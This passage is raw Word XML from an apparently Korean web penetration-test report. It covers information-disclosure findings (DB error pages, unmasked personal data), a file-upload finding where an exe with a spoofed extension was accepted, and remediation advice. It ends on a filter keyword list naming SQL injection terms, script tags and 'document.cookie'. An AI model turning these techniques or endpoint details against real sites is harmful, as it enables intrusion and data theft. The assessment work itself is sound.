          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E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execute", "fetch", "insert", "kill", "open",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E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select", "sys", "sysobjects", "syscolumns",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E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table", "update","'", "and", "cast", "substring",_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1589" w:rsidRPr="00C97C1E" w:rsidRDefault="005F1589" w:rsidP="005F1589">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:ind w:leftChars="425" w:left="850"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">                  "&lt;script&gt;", "&lt;/script&gt;","document.cookie") ]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00490D58" w:rsidRPr="00C97C1E" w:rsidRDefault="00490D58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C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C243C" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc48909029"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>정보누출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
    </w:p>
    <w:p w:rsidR="002C17C0" w:rsidRPr="00C97C1E" w:rsidRDefault="002C17C0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27" w:name="_Toc48909030"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
    </w:p>
    <w:p w:rsidR="00DC166C" w:rsidRPr="00922158" w:rsidRDefault="003C2999" w:rsidP="003C2999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="00DC166C" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidR="00DC166C" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 어플리케이션의 민감한 정보가 개발자의 부주의로 인해 노출되는 것으로 중요 정보(관리자 계정 및 테스트 계정 등)를 주석구문에 포함시켜 의도하지 않게 정보가 노출되는 </w:t>
      </w:r>
      <w:r w:rsidR="008733EF" w:rsidRPr="00922158">
        <w:t>취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C17C0" w:rsidRPr="00922158" w:rsidRDefault="003C2999" w:rsidP="00490D58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t>-</w:t>
      </w:r>
      <w:r w:rsidR="00DC166C" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 디폴트로 설정된 에러 페이지를 그대로 사용할 경우 시스템 내부 문제점을 자세하게 출력해주기 때문에 절대경로, 상태코드, 데이터베이스 종류, 질의</w:t>
      </w:r>
      <w:r w:rsidR="008733EF" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC166C" w:rsidRPr="00922158">
        <w:t xml:space="preserve">문 등이 노출될 수 있으며 이 밖에도 공격자가 검색엔진을 통하여 각종 개인 정보 및 서버 정보 등 해킹에 필요한 정보를 획득할 수 </w:t>
      </w:r>
      <w:r w:rsidR="008733EF" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>있</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057365A" w:rsidRPr="00C97C1E" w:rsidRDefault="0057365A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28" w:name="_Toc48909031"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="428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57365A" w:rsidRPr="00C97C1E" w:rsidTr="003C2999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57365A" w:rsidRPr="00922158" w:rsidRDefault="003C2999" w:rsidP="003C2999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취약한</w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve"> 매소드/경로</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5781" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003C2999" w:rsidRPr="00922158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t>* GET /m_view.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003C2999" w:rsidRPr="00922158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t xml:space="preserve">* POST /jsp/login_proc.jsp </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003C2999" w:rsidRPr="00922158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t>* GET /m_mall_list.php?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0057365A" w:rsidRPr="00922158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t>* POST /m_poll_ok.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00177D19" w:rsidRPr="00922158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t>* m_member_form.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0057365A" w:rsidRPr="00C97C1E" w:rsidTr="003C2999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57365A" w:rsidRPr="00922158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429" w:name="_Toc394497629"/>
            <w:bookmarkStart w:id="430" w:name="_Toc408759343"/>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>설명</w:t>
            </w:r>
            <w:bookmarkEnd w:id="429"/>
            <w:bookmarkEnd w:id="430"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5781" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0057365A" w:rsidRPr="00922158" w:rsidRDefault="003C2999" w:rsidP="00226BC4">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="005740F6" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">DB에러페이지에서 </w:t>
            </w:r>
            <w:r w:rsidR="005740F6" w:rsidRPr="00922158">
              <w:t xml:space="preserve">DB </w:t>
            </w:r>
            <w:r w:rsidR="005740F6" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>테이블 및 칼럼 정보 노출</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003C2999" w:rsidRPr="00922158" w:rsidRDefault="003C2999" w:rsidP="00226BC4">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00DA26A1" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">민감한 </w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>중요 개인 정보 노출</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0057365A" w:rsidRPr="00C97C1E" w:rsidRDefault="0057365A" w:rsidP="0057365A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C2999" w:rsidRPr="00C97C1E" w:rsidRDefault="003C2999" w:rsidP="003C299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>자동화 공격을 통해 웹</w:t>
      </w:r>
      <w:r w:rsidR="00F82A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">서버의 중요한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">정보를 </w:t>
      </w:r>
      <w:r w:rsidR="00A95A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>획</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>득</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C2999" w:rsidRPr="00C97C1E" w:rsidRDefault="003C2999" w:rsidP="003C299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6759740B" wp14:editId="6DC5B79D">
            <wp:extent cx="4858114" cy="2880000"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15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6" t="13627" r="36517" b="44198"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4866398" cy="288491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06" w:rsidRPr="00922158" w:rsidRDefault="003C2999" w:rsidP="008E1230">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="_Toc48909156"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림 3</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0"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DA26A1" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>마스킹 처리 되지 않은 민감한 정보</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
    </w:p>
    <w:p w:rsidR="008E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E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8E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E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8E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E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8E529E" w:rsidRPr="00C97C1E" w:rsidRDefault="008E529E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0057365A" w:rsidRPr="00C97C1E" w:rsidRDefault="0057365A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32" w:name="_Toc48909032"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
    </w:p>
    <w:p w:rsidR="008E529E" w:rsidRPr="00922158" w:rsidRDefault="008E529E" w:rsidP="00B53AA6">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 어플리케이션</w:t>
      </w:r>
      <w:r w:rsidR="00B53AA6" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidR="00B53AA6" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모든</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 웹 페이지에 대해 개발단계에서 디버깅 및 테스트를 목적으로 작성한</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 주석구문에</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 서버 주요 정보가 포함되어 있을 경우 공격자가 해당 정보를</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 다른</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 취약점과 연계해 사용할 수 있으므로 </w:t>
      </w:r>
      <w:r w:rsidR="00BB6757" w:rsidRPr="00922158">
        <w:t xml:space="preserve">제거 </w:t>
      </w:r>
      <w:r w:rsidR="00BB6757" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>권고</w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4A8A" w:rsidRPr="00922158" w:rsidRDefault="008E529E" w:rsidP="00490D58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</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 서버 보안 설정 : </w:t>
      </w:r>
      <w:r w:rsidR="00D248A0" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공통의 에러 페이지를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t>웹 서버</w:t>
      </w:r>
      <w:r w:rsidR="00D248A0" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> 보안 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="00490D58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민감한 주요 정보를 마스킹 처리함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="00490D58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주요한 정보는 서버에서 처리하며, 꼭 필요한 정보가 아니라면 클라이언트에게 응답을 하지 않게 시큐어 코딩을 하여 웹</w:t>
      </w:r>
      <w:r w:rsidR="00F82A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버 구축함</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4" w:rsidP="00490D58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</w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="_Toc48909033"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>악성 콘텐츠</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4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226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4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226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4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226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4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34" w:name="_Toc48909034"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00922158" w:rsidRDefault="008C7EC1" w:rsidP="008C7EC1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="00226BC4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 사이트 게시판,</w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>댓글,</w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자료실 등에 정상적인 콘텐츠 대신에 악성 콘텐츠를 주입하여 실행 될 경우 사용자가 원본 콘텐츠 대신 악성 콘텐츠를 열람할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4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35" w:name="_Toc48909035"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435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226BC4" w:rsidRPr="00922158" w:rsidTr="008E1230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226BC4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="00DA26A1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226BC4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="00DA26A1">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="00DA26A1" w:rsidRPr="00922158">
              <w:t>m_write.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00226BC4" w:rsidRPr="00922158" w:rsidTr="008E1230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226BC4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="008E123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226BC4" w:rsidRPr="00922158" w:rsidRDefault="00DA26A1" w:rsidP="00DA26A1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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>- 악성 콘텐츠를 업로드 할 수 있는 자료실 게시판이 존재</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F" w:rsidP="00226BC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD5F2F" w:rsidRPr="00C97C1E" w:rsidRDefault="00DD5F2F" w:rsidP="00DD5F2F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226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4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5B7E78" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">exe </w:t>
      </w:r>
      <w:r w:rsidR="005B7E78" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일을 확장자 변조해서 업로드 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00C85BAA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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4872990" cy="3059430"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="26670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3059430"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4872990" cy="305943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0" r="46498" b="41055"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4872990" cy="305943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9" name="그룹 19"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="612475" y="1915064"/>
                            <a:ext cx="3907766" cy="1095554"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="3907766" cy="1095554"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="17" name="직사각형 17"/>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="1224951" cy="172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직사각형 18"/>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="1595887" y="845388"/>
                              <a:ext cx="2311879" cy="250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51AF7F" id="그룹 20" o:spid="_x0000_s1026" style="width:383.7pt;height:240.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="48729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width:48729;height:30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dhFTDAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj81qwzAQhO+FvIPYQm6N3B5i41oObqDE&#10;mFJokgdYrPVPa62MpcTO20eFQo/DzHzDZLvFDOJKk+stK3jeRCCIa6t7bhWcT+9PCQjnkTUOlknB&#10;jRzs8tVDhqm2M3/R9ehbESDsUlTQeT+mUrq6I4NuY0fi4DV2MuiDnFqpJ5wD3AzyJYq20mDPYaHD&#10;kfYd1T/Hi1HwUZ6b5PPwLas5fjstheOiqVip9eNSvILwtPj/8F+71Api+L0SboD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2EVMMAAADaAAAADwAAAAAAAAAAAAAAAACf&#10;AgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAI8DAAAAAA==&#10;" stroked="t" strokecolor="windowText" strokeweight=".5pt">
                  <v:stroke joinstyle="round"/>
                  <v:imagedata r:id="rId15" o:title="" croptop="4109f" cropbottom="26906f" cropright="30473f"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:group id="그룹 19" o:spid="_x0000_s1028" style="position:absolute;left:6124;top:19150;width:39078;height:10956" coordsize="39077,10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직사각형 17" o:spid="_x0000_s1029" style="position:absolute;width:12249;height:1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ghsUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzKCl1I3tZBK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uCGxQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" strokecolor="red" strokeweight="2pt"/>
                  <v:rect id="직사각형 18" o:spid="_x0000_s1030" style="position:absolute;left:15958;top:8453;width:23119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09MQA&#10;AADb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SXs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dPTEAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="2pt"/>
                </v:group>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00922158" w:rsidRDefault="00226BC4" w:rsidP="00226BC4">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="_Toc48909157"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림 3</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00EA4BB0" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00EA4BB0"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5B7E78" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="005B7E78" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B7E78" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>파일 업로드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="436"/>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="00226BC4" w:rsidP="00226BC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00226BC4" w:rsidRPr="00C97C1E" w:rsidRDefault="005B7E78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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00226BC4" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
